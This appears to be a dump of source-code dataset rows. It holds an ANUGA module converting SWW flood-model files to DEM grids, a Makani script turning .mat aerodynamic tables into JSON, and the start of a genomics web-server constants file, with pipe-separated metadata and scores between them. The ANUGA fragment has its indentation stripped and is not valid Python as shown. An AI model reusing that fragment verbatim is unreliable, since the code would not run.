msg = 'Slicing sww file, num points: ' + str(number_of_points)
msg += ', block size: ' + str(block_size)
log.critical(msg)
for start_slice in range(0, number_of_points, block_size):
# Limit slice size to array end if at last block
end_slice = min(start_slice + block_size, number_of_points)
# Get slices of all required variables
if type(reduction) is not types.BuiltinFunctionType:
q_dict = {}
for name in var_list:
# check if variable has time axis
if len(fid.variables[name].shape) == 2:
print('avoiding large array')
q_dict[name] = fid.variables[name][reduction,start_slice:end_slice]
else: # no time axis
q_dict[name] = fid.variables[name][start_slice:end_slice]
# Evaluate expression with quantities found in SWW file
res = apply_expression_to_dictionary(quantity, q_dict)
# if len(res.shape) == 2:
# new_res = num.zeros(res.shape[1], num.float)
# for k in xrange(res.shape[1]):
# if type(reduction) is not types.BuiltinFunctionType:
# new_res[k] = res[k]
# else:
# new_res[k] = reduction(res[:,k])
# res = new_res
else:
q_dict = {}
for name in var_list:
# check if variable has time axis
if len(fid.variables[name].shape) == 2:
q_dict[name] = fid.variables[name][:,start_slice:end_slice]
else: # no time axis
q_dict[name] = fid.variables[name][start_slice:end_slice]
# Evaluate expression with quantities found in SWW file
res = apply_expression_to_dictionary(quantity, q_dict)
if len(res.shape) == 2:
new_res = num.zeros(res.shape[1], num.float)
for k in range(res.shape[1]):
if type(reduction) is not types.BuiltinFunctionType:
new_res[k] = res[reduction,k]
else:
new_res[k] = reduction(res[:,k])
res = new_res
result[start_slice:end_slice] = res
# Post condition: Now q has dimension: number_of_points
assert len(result.shape) == 1
assert result.shape[0] == number_of_points
if verbose:
log.critical('Processed values for %s are in [%f, %f]'
% (quantity, min(result), max(result)))
# Create grid and update xll/yll corner and x,y
# Relative extent
if easting_min is None:
xmin = min(x)
else:
xmin = easting_min - xllcorner
if easting_max is None:
xmax = max(x)
else:
xmax = easting_max - xllcorner
if northing_min is None:
ymin = min(y)
else:
ymin = northing_min - yllcorner
if northing_max is None:
ymax = max(y)
else:
ymax = northing_max - yllcorner
msg = 'xmax must be greater than or equal to xmin.\n'
msg += 'I got xmin = %f, xmax = %f' %(xmin, xmax)
assert xmax >= xmin, msg
msg = 'ymax must be greater than or equal to xmin.\n'
msg += 'I got ymin = %f, ymax = %f' %(ymin, ymax)
assert ymax >= ymin, msg
if verbose: log.critical('Creating grid')
ncols = int(old_div((xmax-xmin),cellsize)) + 1
nrows = int(old_div((ymax-ymin),cellsize)) + 1
# New absolute reference and coordinates
newxllcorner = xmin + xllcorner
newyllcorner = ymin + yllcorner
x = x + xllcorner - newxllcorner
y = y + yllcorner - newyllcorner
grid_values = num.zeros( (nrows*ncols, ), num.float)
#print '---',grid_values.shape
num_tri = len(volumes)
norms = num.zeros(6*num_tri, num.float)
#Use fasr method to calc grid values
from .calc_grid_values_ext import calc_grid_values
calc_grid_values(nrows, ncols, cellsize, NODATA_value,
x,y, norms, volumes, result, grid_values)
fid.close()
#print outside_indices
if verbose:
log.critical('Interpolated values are in [%f, %f]'
% (num.min(grid_values), num.max(grid_values)))
return x,y, grid_values.reshape(nrows,ncols)[::-1,:]
| """
Module to convert SWW to DEM files.
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
# external modules
from builtins import str
from builtins import range
from past.utils import old_div
from future.utils import raise_
import os
import numpy as num
# ANUGA modules
from anuga.abstract_2d_finite_volumes.util import remove_lone_verts
from anuga.coordinate_transforms.geo_reference import Geo_reference
from anuga.utilities.system_tools import get_vars_in_expression
import anuga.utilities.log as log
from anuga.utilities.file_utils import get_all_swwfiles
######
# formula mappings
######
quantity_formula = {'momentum':'(xmomentum**2 + ymomentum**2)**0.5',
'depth':'stage-elevation',
'speed': \
'(xmomentum**2 + ymomentum**2)**0.5/(stage-elevation+1.e-6/(stage-elevation))'}
# Default block size for sww2dem()
DEFAULT_BLOCK_SIZE = 100000
def sww2array(name_in,
quantity=None, # defaults to elevation
reduction=None,
cellsize=10,
number_of_decimal_places=None,
NODATA_value=-9999.0,
easting_min=None,
easting_max=None,
northing_min=None,
northing_max=None,
verbose=False,
origin=None,
datum='WGS84',
block_size=None):
"""Read SWW file and convert to a numpy array (can be stored to a png file later)
The parameter quantity must be the name of an existing quantity or
an expression involving existing quantities. The default is
'elevation'. Quantity is not a list of quantities.
If reduction is given and it's an index, sww2array will output the quantity at that time-step.
If reduction is given and it's a built in function (eg max, min, mean), then that
function is used to reduce the quantity over all time-steps. If reduction is not given,
reduction is set to "max" by default.
datum
block_size - sets the number of slices along the non-time axis to
process in one block.
"""
import sys
import types
from anuga.geometry.polygon import inside_polygon, outside_polygon
from anuga.abstract_2d_finite_volumes.util import \
apply_expression_to_dictionary
basename_in, in_ext = os.path.splitext(name_in)
if in_ext != '.sww':
raise IOError('Input format for %s must be .sww' % name_in)
false_easting = 500000
false_northing = 10000000
if quantity is None:
quantity = 'elevation'
if reduction is None:
reduction = max
if quantity in quantity_formula:
quantity = quantity_formula[quantity]
if number_of_decimal_places is None:
number_of_decimal_places = 3
if block_size is None:
block_size = DEFAULT_BLOCK_SIZE
assert(isinstance(block_size, (int, int, float)))
# Read sww file
if verbose:
log.critical('Reading from %s' % name_in)
from anuga.file.netcdf import NetCDFFile
fid = NetCDFFile(name_in)
#Get extent and reference
x = num.array(fid.variables['x'], num.float)
y = num.array(fid.variables['y'], num.float)
volumes = num.array(fid.variables['volumes'], num.int)
if type(reduction) is not types.BuiltinFunctionType:
times = fid.variables['time'][reduction]
else:
times = fid.variables['time'][:]
number_of_timesteps = fid.dimensions['number_of_timesteps']
number_of_points = fid.dimensions['number_of_points']
if origin is None:
# Get geo_reference
# sww files don't have to have a geo_ref
try:
geo_reference = Geo_reference(NetCDFObject=fid)
except AttributeError as e:
geo_reference = Geo_reference() # Default georef object
xllcorner = geo_reference.get_xllcorner()
yllcorner = geo_reference.get_yllcorner()
zone = geo_reference.get_zone()
else:
zone = origin[0]
xllcorner = origin[1]
yllcorner = origin[2]
# FIXME: Refactor using code from Interpolation_function.statistics
# (in interpolate.py)
# Something like print swwstats(swwname)
if verbose:
log.critical('------------------------------------------------')
log.critical('Statistics of SWW file:')
log.critical(' Name: %s' % name_in)
log.critical(' Reference:')
log.critical(' Lower left corner: [%f, %f]' % (xllcorner, yllcorner))
if type(reduction) is not types.BuiltinFunctionType:
log.critical(' Time: %f' % times)
else:
log.critical(' Start time: %f' % fid.starttime[0])
log.critical(' Extent:')
log.critical(' x [m] in [%f, %f], len(x) == %d'
%(num.min(x), num.max(x), len(x.flat)))
log.critical(' y [m] in [%f, %f], len(y) == %d'
% (num.min(y), num.max(y), len(y.flat)))
if type(reduction) is not types.BuiltinFunctionType:
log.critical(' t [s] = %f, len(t) == %d' % (times, 1))
else:
log.critical(' t [s] in [%f, %f], len(t) == %d'
% (min(times), max(times), len(times)))
log.critical(' Quantities [SI units]:')
# Comment out for reduced memory consumption
for name in ['stage', 'xmomentum', 'ymomentum']:
q = fid.variables[name][:].flatten()
if type(reduction) is not types.BuiltinFunctionType:
q = q[reduction*len(x):(reduction+1)*len(x)]
if verbose: log.critical(' %s in [%f, %f]'
% (name, min(q), max(q)))
for name in ['elevation']:
q = fid.variables[name][:].flatten()
if verbose: log.critical(' %s in [%f, %f]'
% (name, min(q), max(q)))
# Get the variables in the supplied expression.
# This may throw a SyntaxError exception.
var_list = get_vars_in_expression(quantity)
# Check that we have the required variables in the SWW file.
missing_vars = []
for name in var_list:
try:
_ = fid.variables[name]
except KeyError:
missing_vars.append(name)
if missing_vars:
msg = ("In expression '%s', variables %s are not in the SWW file '%s'"
% (quantity, str(missing_vars), name_in))
raise_(Exception, msg)
# Create result array and start filling, block by block.
result = num.zeros(number_of_points, num.float)
if verbose:
msg = 'Slicing sww file, num points: ' + str(number_of_points)
msg += ', block size: ' + str(block_size)
log.critical(msg)
for start_slice in range(0, number_of_points, block_size):
# Limit slice size to array end if at last block
end_slice = min(start_slice + block_size, number_of_points)
# Get slices of all required variables
if type(reduction) is not types.BuiltinFunctionType:
q_dict = {}
for name in var_list:
# check if variable has time axis
if len(fid.variables[name].shape) == 2:
print('avoiding large array')
q_dict[name] = fid.variables[name][reduction,start_slice:end_slice]
else: # no time axis
q_dict[name] = fid.variables[name][start_slice:end_slice]
# Evaluate expression with quantities found in SWW file
res = apply_expression_to_dictionary(quantity, q_dict)
# if len(res.shape) == 2:
# new_res = num.zeros(res.shape[1], num.float)
# for k in xrange(res.shape[1]):
# if type(reduction) is not types.BuiltinFunctionType:
# new_res[k] = res[k]
# else:
# new_res[k] = reduction(res[:,k])
# res = new_res
else:
q_dict = {}
for name in var_list:
# check if variable has time axis
if len(fid.variables[name].shape) == 2:
q_dict[name] = fid.variables[name][:,start_slice:end_slice]
else: # no time axis
q_dict[name] = fid.variables[name][start_slice:end_slice]
# Evaluate expression with quantities found in SWW file
res = apply_expression_to_dictionary(quantity, q_dict)
if len(res.shape) == 2:
new_res = num.zeros(res.shape[1], num.float)
for k in range(res.shape[1]):
if type(reduction) is not types.BuiltinFunctionType:
new_res[k] = res[reduction,k]
else:
new_res[k] = reduction(res[:,k])
res = new_res
result[start_slice:end_slice] = res
# Post condition: Now q has dimension: number_of_points
assert len(result.shape) == 1
assert result.shape[0] == number_of_points
if verbose:
log.critical('Processed values for %s are in [%f, %f]'
% (quantity, min(result), max(result)))
# Create grid and update xll/yll corner and x,y
# Relative extent
if easting_min is None:
xmin = min(x)
else:
xmin = easting_min - xllcorner
if easting_max is None:
xmax = max(x)
else:
xmax = easting_max - xllcorner
if northing_min is None:
ymin = min(y)
else:
ymin = northing_min - yllcorner
if northing_max is None:
ymax = max(y)
else:
ymax = northing_max - yllcorner
msg = 'xmax must be greater than or equal to xmin.\n'
msg += 'I got xmin = %f, xmax = %f' %(xmin, xmax)
assert xmax >= xmin, msg
msg = 'ymax must be greater than or equal to xmin.\n'
msg += 'I got ymin = %f, ymax = %f' %(ymin, ymax)
assert ymax >= ymin, msg
if verbose: log.critical('Creating grid')
ncols = int(old_div((xmax-xmin),cellsize)) + 1
nrows = int(old_div((ymax-ymin),cellsize)) + 1
# New absolute reference and coordinates
newxllcorner = xmin + xllcorner
newyllcorner = ymin + yllcorner
x = x + xllcorner - newxllcorner
y = y + yllcorner - newyllcorner
grid_values = num.zeros( (nrows*ncols, ), num.float)
#print '---',grid_values.shape
num_tri = len(volumes)
norms = num.zeros(6*num_tri, num.float)
#Use fasr method to calc grid values
from .calc_grid_values_ext import calc_grid_values
calc_grid_values(nrows, ncols, cellsize, NODATA_value,
x,y, norms, volumes, result, grid_values)
fid.close()
#print outside_indices
if verbose:
log.critical('Interpolated values are in [%f, %f]'
% (num.min(grid_values), num.max(grid_values)))
return x,y, grid_values.reshape(nrows,ncols)[::-1,:] | en | 0.743315 | Module to convert SWW to DEM files. # external modules # ANUGA modules ###### # formula mappings ###### # Default block size for sww2dem() # defaults to elevation Read SWW file and convert to a numpy array (can be stored to a png file later) The parameter quantity must be the name of an existing quantity or an expression involving existing quantities. The default is 'elevation'. Quantity is not a list of quantities. If reduction is given and it's an index, sww2array will output the quantity at that time-step. If reduction is given and it's a built in function (eg max, min, mean), then that function is used to reduce the quantity over all time-steps. If reduction is not given, reduction is set to "max" by default. datum block_size - sets the number of slices along the non-time axis to process in one block. # Read sww file #Get extent and reference # Get geo_reference # sww files don't have to have a geo_ref # Default georef object # FIXME: Refactor using code from Interpolation_function.statistics # (in interpolate.py) # Something like print swwstats(swwname) # Comment out for reduced memory consumption # Get the variables in the supplied expression. # This may throw a SyntaxError exception. # Check that we have the required variables in the SWW file. # Create result array and start filling, block by block. # Limit slice size to array end if at last block # Get slices of all required variables # check if variable has time axis # no time axis # Evaluate expression with quantities found in SWW file # if len(res.shape) == 2: # new_res = num.zeros(res.shape[1], num.float) # for k in xrange(res.shape[1]): # if type(reduction) is not types.BuiltinFunctionType: # new_res[k] = res[k] # else: # new_res[k] = reduction(res[:,k]) # res = new_res # check if variable has time axis # no time axis # Evaluate expression with quantities found in SWW file # Post condition: Now q has dimension: number_of_points # Create grid and update xll/yll corner and x,y # Relative extent # New absolute reference and coordinates #print '---',grid_values.shape #Use fasr method to calc grid values #print outside_indices | 2.390723 | 2 |
analysis/aero/avl_mat_to_json.py | leozz37/makani | 1,178 | 6632465 | #!/usr/bin/python
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Conversion utility for transforming .mat aerodynamics databases to .json."""
import collections
import json
import sys
import gflags
from makani.control import system_types
from makani.lib.python import dict_util
import numpy
from scipy import io
FLAGS = gflags.FLAGS
gflags.DEFINE_string('input_file', None, 'MATLAB .mat file to read in.')
gflags.DEFINE_string('output_file', None, 'JSON file to write to.')
def _ConvertMatlabStructure(data):
"""Convert a database loaded from a .mat file to be written to a JSON file."""
if not hasattr(data, 'dtype'):
raise ValueError('Argument must be an numpy array.')
if hasattr(data.dtype, 'fields') and data.dtype.fields:
result = {}
for key in data.dtype.fields.keys():
result[key] = _ConvertMatlabStructure(data[key])
return result
elif data.dtype == numpy.dtype('O'):
if data.size != 1:
raise ValueError('Structures must be scalar.')
return _ConvertMatlabStructure(data[0])
elif data.shape and data.shape[-1] == 1:
return _ConvertMatlabStructure(data[..., 0])
else:
return data.tolist()
def main(argv):
try:
argv = FLAGS(argv)
except gflags.FlagsError, e:
print '%s\\nUsage: %s ARGS\\n%s' % (e, sys.argv[0], FLAGS)
sys.exit(1)
data = io.loadmat(FLAGS.input_file)['database']
# Parameters and grid defintiion.
keys = [
'reynolds_number',
'num_alphas', 'num_betas', 'num_deltas',
'alphads', 'betads', 'deltads',
'flap_list', 'omega_hat', 'Sref',
'Cref', 'Bref', 'mach_number'
]
# Arrays of data that are of shape (num_deltas, num_alphas, num_betas)
# in shape.
coefficients = [
'CLtot', 'CDtot', 'de1',
'CXtot', 'CYtot', 'CZtot',
'Cltot', 'Cmtot', 'Cntot',
'CXp', 'CXq', 'CXr',
'Clp', 'Clq', 'Clr',
'CYp', 'CYq', 'CYr',
'Cmp', 'Cmq', 'Cmr',
'CZp', 'CZq', 'CZr',
'Cnp', 'Cnq', 'Cnr',
'CXd1', 'CYd1', 'CZd1',
'Cld1', 'Cmd1', 'Cnd1',
'CXd2', 'CYd2', 'CZd2',
'Cld2', 'Cmd2', 'Cnd2',
'CXd3', 'CYd3', 'CZd3',
'Cld3', 'Cmd3', 'Cnd3',
'CXd4', 'CYd4', 'CZd4',
'Cld4', 'Cmd4', 'Cnd4',
'CXd5', 'CYd5', 'CZd5',
'Cld5', 'Cmd5', 'Cnd5',
'CXd6', 'CYd6', 'CZd6',
'Cld6', 'Cmd6', 'Cnd6',
'CXd7', 'CYd7', 'CZd7',
'Cld7', 'Cmd7', 'Cnd7',
'CXd8', 'CYd8', 'CZd8',
'Cld8', 'Cmd8', 'Cnd8'
]
output_dict = _ConvertMatlabStructure(data)
output_dict = collections.OrderedDict(
[(key, output_dict[key]) for key in keys]
+ [(key, output_dict[key]) for key in coefficients]
+ [('params', dict_util.OrderDict(output_dict['params']))]
)
# Force shapes to be correct.
output_dict['alphads'] = numpy.reshape(output_dict['alphads'],
(output_dict['num_alphas'],)).tolist()
output_dict['betads'] = numpy.reshape(output_dict['betads'],
(output_dict['num_betas'],)).tolist()
output_dict['deltads'] = numpy.reshape(output_dict['deltads'],
(output_dict['num_deltas'],)).tolist()
output_dict['flap_list'] = numpy.reshape(
output_dict['flap_list'], (system_types.kNumFlaps,)).tolist()
output_dict['omega_hat'] = numpy.reshape(
output_dict['omega_hat'], (3,)).tolist()
for coeff in coefficients:
output_dict[coeff] = numpy.reshape(
output_dict[coeff],
(output_dict['num_deltas'], output_dict['num_alphas'],
output_dict['num_betas'])).tolist()
output_string = json.dumps(output_dict, separators=(', ', ':\n '))
output_string = (output_string
.replace(', \"', ',\n\"')
.replace('], [', '],\n [')
.replace(' [[', '[[')
.replace('{', '{\n')
.replace('}', '\n}')) + '\n'
with open(FLAGS.output_file, 'w') as f:
f.write(output_string)
if __name__ == '__main__':
gflags.MarkFlagAsRequired('input_file')
gflags.MarkFlagAsRequired('output_file')
main(sys.argv)
| #!/usr/bin/python
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Conversion utility for transforming .mat aerodynamics databases to .json."""
import collections
import json
import sys
import gflags
from makani.control import system_types
from makani.lib.python import dict_util
import numpy
from scipy import io
FLAGS = gflags.FLAGS
gflags.DEFINE_string('input_file', None, 'MATLAB .mat file to read in.')
gflags.DEFINE_string('output_file', None, 'JSON file to write to.')
def _ConvertMatlabStructure(data):
"""Convert a database loaded from a .mat file to be written to a JSON file."""
if not hasattr(data, 'dtype'):
raise ValueError('Argument must be an numpy array.')
if hasattr(data.dtype, 'fields') and data.dtype.fields:
result = {}
for key in data.dtype.fields.keys():
result[key] = _ConvertMatlabStructure(data[key])
return result
elif data.dtype == numpy.dtype('O'):
if data.size != 1:
raise ValueError('Structures must be scalar.')
return _ConvertMatlabStructure(data[0])
elif data.shape and data.shape[-1] == 1:
return _ConvertMatlabStructure(data[..., 0])
else:
return data.tolist()
def main(argv):
try:
argv = FLAGS(argv)
except gflags.FlagsError, e:
print '%s\\nUsage: %s ARGS\\n%s' % (e, sys.argv[0], FLAGS)
sys.exit(1)
data = io.loadmat(FLAGS.input_file)['database']
# Parameters and grid defintiion.
keys = [
'reynolds_number',
'num_alphas', 'num_betas', 'num_deltas',
'alphads', 'betads', 'deltads',
'flap_list', 'omega_hat', 'Sref',
'Cref', 'Bref', 'mach_number'
]
# Arrays of data that are of shape (num_deltas, num_alphas, num_betas)
# in shape.
coefficients = [
'CLtot', 'CDtot', 'de1',
'CXtot', 'CYtot', 'CZtot',
'Cltot', 'Cmtot', 'Cntot',
'CXp', 'CXq', 'CXr',
'Clp', 'Clq', 'Clr',
'CYp', 'CYq', 'CYr',
'Cmp', 'Cmq', 'Cmr',
'CZp', 'CZq', 'CZr',
'Cnp', 'Cnq', 'Cnr',
'CXd1', 'CYd1', 'CZd1',
'Cld1', 'Cmd1', 'Cnd1',
'CXd2', 'CYd2', 'CZd2',
'Cld2', 'Cmd2', 'Cnd2',
'CXd3', 'CYd3', 'CZd3',
'Cld3', 'Cmd3', 'Cnd3',
'CXd4', 'CYd4', 'CZd4',
'Cld4', 'Cmd4', 'Cnd4',
'CXd5', 'CYd5', 'CZd5',
'Cld5', 'Cmd5', 'Cnd5',
'CXd6', 'CYd6', 'CZd6',
'Cld6', 'Cmd6', 'Cnd6',
'CXd7', 'CYd7', 'CZd7',
'Cld7', 'Cmd7', 'Cnd7',
'CXd8', 'CYd8', 'CZd8',
'Cld8', 'Cmd8', 'Cnd8'
]
output_dict = _ConvertMatlabStructure(data)
output_dict = collections.OrderedDict(
[(key, output_dict[key]) for key in keys]
+ [(key, output_dict[key]) for key in coefficients]
+ [('params', dict_util.OrderDict(output_dict['params']))]
)
# Force shapes to be correct.
output_dict['alphads'] = numpy.reshape(output_dict['alphads'],
(output_dict['num_alphas'],)).tolist()
output_dict['betads'] = numpy.reshape(output_dict['betads'],
(output_dict['num_betas'],)).tolist()
output_dict['deltads'] = numpy.reshape(output_dict['deltads'],
(output_dict['num_deltas'],)).tolist()
output_dict['flap_list'] = numpy.reshape(
output_dict['flap_list'], (system_types.kNumFlaps,)).tolist()
output_dict['omega_hat'] = numpy.reshape(
output_dict['omega_hat'], (3,)).tolist()
for coeff in coefficients:
output_dict[coeff] = numpy.reshape(
output_dict[coeff],
(output_dict['num_deltas'], output_dict['num_alphas'],
output_dict['num_betas'])).tolist()
output_string = json.dumps(output_dict, separators=(', ', ':\n '))
output_string = (output_string
.replace(', \"', ',\n\"')
.replace('], [', '],\n [')
.replace(' [[', '[[')
.replace('{', '{\n')
.replace('}', '\n}')) + '\n'
with open(FLAGS.output_file, 'w') as f:
f.write(output_string)
if __name__ == '__main__':
gflags.MarkFlagAsRequired('input_file')
gflags.MarkFlagAsRequired('output_file')
main(sys.argv)
| en | 0.820102 | #!/usr/bin/python # Copyright 2020 Makani Technologies LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Conversion utility for transforming .mat aerodynamics databases to .json. Convert a database loaded from a .mat file to be written to a JSON file. # Parameters and grid defintiion. # Arrays of data that are of shape (num_deltas, num_alphas, num_betas) # in shape. # Force shapes to be correct. | 2.556003 | 3 |
server/web_constants.py | lrgr/imuse-server | 0 | 6632466 | import os
import re
from enum import Enum
OBJ_DIR = '/obj'
META_DATA_FILENAME = 'meta-data.tsv'
META_SIGS_FILENAME = 'meta-sigs.tsv'
META_PATHWAYS_FILENAME = 'meta-pathways.tsv'
META_FEATURED_FILENAME = 'meta-featured.tsv'
META_CLINICAL_FILENAME = 'meta-clinical.tsv'
META_TRICOUNTS_FILENAME = 'meta-tricounts.tsv'
ONCOTREE_FILENAME = 'oncotree-2018_11_01.json'
GENES_AGG_FILENAME = 'computed-genes_agg-{letter}.tsv'
SAMPLES_AGG_FILENAME = 'computed-samples_agg.tsv'
PROJ_TO_SIGS_FILENAME = 'computed-oncotree_proj_to_sigs_per_group.tsv'
META_DATA_FILE = os.path.join(OBJ_DIR, META_DATA_FILENAME)
META_SIGS_FILE = os.path.join(OBJ_DIR, META_SIGS_FILENAME)
META_PATHWAYS_FILE = os.path.join(OBJ_DIR, META_PATHWAYS_FILENAME)
META_FEATURED_FILE = os.path.join(OBJ_DIR, META_FEATURED_FILENAME)
META_CLINICAL_FILE = os.path.join(OBJ_DIR, META_CLINICAL_FILENAME)
META_TRICOUNTS_FILE = os.path.join(OBJ_DIR, META_TRICOUNTS_FILENAME)
GENES_AGG_FILE = os.path.join(OBJ_DIR, GENES_AGG_FILENAME)
SAMPLES_AGG_FILE = os.path.join(OBJ_DIR, SAMPLES_AGG_FILENAME)
ONCOTREE_FILE = os.path.join(OBJ_DIR, ONCOTREE_FILENAME)
PROJ_TO_SIGS_FILE = os.path.join(OBJ_DIR, PROJ_TO_SIGS_FILENAME)
EXPLOSIG_CONNECT_HOST = 'explosig_connect:8200'
CAT_TYPES = [
'SBS_96',
'DBS_78',
'INDEL_Alexandrov2018_83'
]
MUT_TYPES = [
'SBS',
'DBS',
'INDEL'
]
MUT_TYPE_MAP = {
'SBS': 'SBS_96',
'DBS': 'DBS_78',
'INDEL': 'INDEL_Alexandrov2018_83'
}
CAT_TYPE_MAP = dict([(val, key) for key, val in MUT_TYPE_MAP.items()])
# Regular Expressions
CHROMOSOME_RE = r'^(X|Y|M|[1-9]|1[0-9]|2[0-2])$'
# Column names for extended mutation tables
PATIENT = 'Patient'
SAMPLE = 'Sample'
CANCER_TYPE = 'Cancer Type'
PROVENANCE = 'Provenance'
COHORT = 'Cohort'
CHR = 'Chromosome'
POS_START = 'Start Position'
POS_END = 'End Position'
REF = 'Reference Sequence'
VAR = 'Variant Sequence'
GSTRAND = 'Genomic Strand'
SEQ_TYPE = 'Sequencing Strategy'
MUT_TYPE = 'Mutation Type'
ASSEMBLY = 'Assembly Version'
MUT_CLASS = 'Mutation Classification'
GENE_SYMBOL = "Gene Symbol"
FPRIME = "5' Flanking Bases"
TPRIME = "3' Flanking Bases"
TSTRAND = 'Transcriptional Strand'
MUT_DIST = 'Distance to Previous Mutation'
NEAREST_MUT = 'Distance to Nearest Mutation'
MUT_DIST_ROLLING_MEAN = 'Rolling Mean of 6 Mutation Distances'
KATAEGIS = 'Kataegis'
# Special clinical variables
ICD_O_3_SITE_CODE = 'ICD-O-3 Site Code'
ICD_O_3_SITE_DESC = 'ICD-O-3 Site Description'
ICD_O_3_HISTOLOGY_CODE = 'ICD-O-3 Histology Code'
ICD_O_3_HISTOLOGY_DESC = 'ICD-O-3 Histology Description'
SURVIVAL_DAYS_TO_DEATH = 'Days to Death'
SURVIVAL_DAYS_TO_LAST_FOLLOWUP = 'Days to Last Followup'
# Column names for gene expression tables
GENE_EXPRESSION_RNA_SEQ_MRNA_Z = 'RNA Seq v2 mRNA median Zscore'
CHROMOSOMES = {
'1': 249250621,
'2': 243199373,
'3': 198022430,
'4': 191154276,
'5': 180915260,
'6': 171115067,
'7': 159138663,
'8': 146364022,
'9': 141213431,
'10': 135534747,
'11': 135006516,
'12': 133851895,
'13': 115169878,
'14': 107349540,
'15': 102531392,
'16': 90354753,
'17': 81195210,
'18': 78077248,
'19': 59128983,
'20': 63025520,
'21': 48129895,
'22': 51304566,
'X': 155270560,
'Y': 59373566,
'M': 16571
}
class MUT_CLASS_VALS(Enum):
SILENT = "Silent"
MISSENSE = "Missense"
FRAMESHIFT = "Frameshift"
SPLICE_SITE = "Splice Site"
NONSENSE = "Nonsense"
IN_FRAME_INDEL = "in-frame indel"
OTHER = "Other mutation"
NONSTOP = "Nonstop"
TRANSLATION_START_SITE="Translation Start Site"
# Signatures columns
META_COL_SIG = 'Signature'
META_COL_ONCOTREE_CODE = 'Oncotree Code'
META_COL_CANCER_TYPE = 'Cancer Type'
META_COL_CAT_TYPE = 'Category Type'
META_COL_DESCRIPTION = 'Description'
META_COL_INDEX = 'Index'
META_COL_SIG_GROUP = 'Signature Group'
META_COL_PUBLICATION = 'Publication'
META_COL_PATH_SIGS_META = 'Path to Meta File'
META_COL_PATH_SIGS_DATA = 'Path to Signatures {cat_type} File'
META_COL_PATH_SIGS_CANCER_TYPE_MAP = 'Path to Cancer Type Map File'
META_COL_PATH_SIGS_DATA_LIST = [META_COL_PATH_SIGS_DATA.format(cat_type=val) for val in CAT_TYPES]
META_SIGS_FILE_COLS = [
META_COL_PATH_SIGS_META,
META_COL_PATH_SIGS_CANCER_TYPE_MAP
] + META_COL_PATH_SIGS_DATA_LIST
META_SIGS_COLS = [
META_COL_SIG,
META_COL_DESCRIPTION,
META_COL_INDEX,
META_COL_CAT_TYPE
]
META_CANCER_TYPE_MAP_COLS = [
META_COL_SIG,
META_COL_ONCOTREE_CODE,
META_COL_CANCER_TYPE,
META_COL_CAT_TYPE
]
# Mutation data columns
META_COL_PROJ = 'Project'
META_COL_PROJ_SOURCE = 'Project Source'
META_COL_PROJ_NAME = 'Project Name'
META_COL_PATH_MUTS_COUNTS = 'Path to Counts {cat_type} File'
META_COL_PATH_CLINICAL = 'Path to Clinical File'
META_COL_PATH_SAMPLES = 'Path to Samples File'
META_COL_PATH_GENE_MUT = 'Path to Gene Mutation File'
META_COL_PATH_GENE_EXP = 'Path to Gene Expression File'
META_COL_PATH_GENE_CNA = 'Path to Gene CNA File'
META_COL_PATH_MUTS_COUNTS_LIST = [META_COL_PATH_MUTS_COUNTS.format(cat_type=val) for val in CAT_TYPES]
META_DATA_FILE_COLS = [
META_COL_PATH_CLINICAL,
META_COL_PATH_SAMPLES,
META_COL_PATH_GENE_MUT,
META_COL_PATH_GENE_EXP,
META_COL_PATH_GENE_CNA
] + META_COL_PATH_MUTS_COUNTS_LIST
# Pathways data columns
META_COL_PATHWAYS_GROUP = 'Pathways Group'
META_COL_PATH_PATHWAYS = 'Path to Pathways File'
META_PATHWAYS_FILE_COLS = [
META_COL_PATH_PATHWAYS
]
# Clinical variables columns
META_COL_CLINICAL_COL = 'Clinical Column'
META_COL_CLINICAL_SCALE_TYPE = 'Scale Type'
META_COL_CLINICAL_EXTENT = 'Extent'
META_COL_CLINICAL_VALUE = 'Value'
# Tri-counts data columns
META_COL_TRICOUNTS_METHOD = 'Method'
META_COL_PATH_TRICOUNTS = 'Path to Trinucleotide Counts File'
META_TRICOUNTS_FILE_COLS = [
META_COL_PATH_TRICOUNTS
] | import os
import re
from enum import Enum
OBJ_DIR = '/obj'
META_DATA_FILENAME = 'meta-data.tsv'
META_SIGS_FILENAME = 'meta-sigs.tsv'
META_PATHWAYS_FILENAME = 'meta-pathways.tsv'
META_FEATURED_FILENAME = 'meta-featured.tsv'
META_CLINICAL_FILENAME = 'meta-clinical.tsv'
META_TRICOUNTS_FILENAME = 'meta-tricounts.tsv'
ONCOTREE_FILENAME = 'oncotree-2018_11_01.json'
GENES_AGG_FILENAME = 'computed-genes_agg-{letter}.tsv'
SAMPLES_AGG_FILENAME = 'computed-samples_agg.tsv'
PROJ_TO_SIGS_FILENAME = 'computed-oncotree_proj_to_sigs_per_group.tsv'
META_DATA_FILE = os.path.join(OBJ_DIR, META_DATA_FILENAME)
META_SIGS_FILE = os.path.join(OBJ_DIR, META_SIGS_FILENAME)
META_PATHWAYS_FILE = os.path.join(OBJ_DIR, META_PATHWAYS_FILENAME)
META_FEATURED_FILE = os.path.join(OBJ_DIR, META_FEATURED_FILENAME)
META_CLINICAL_FILE = os.path.join(OBJ_DIR, META_CLINICAL_FILENAME)
META_TRICOUNTS_FILE = os.path.join(OBJ_DIR, META_TRICOUNTS_FILENAME)
GENES_AGG_FILE = os.path.join(OBJ_DIR, GENES_AGG_FILENAME)
SAMPLES_AGG_FILE = os.path.join(OBJ_DIR, SAMPLES_AGG_FILENAME)
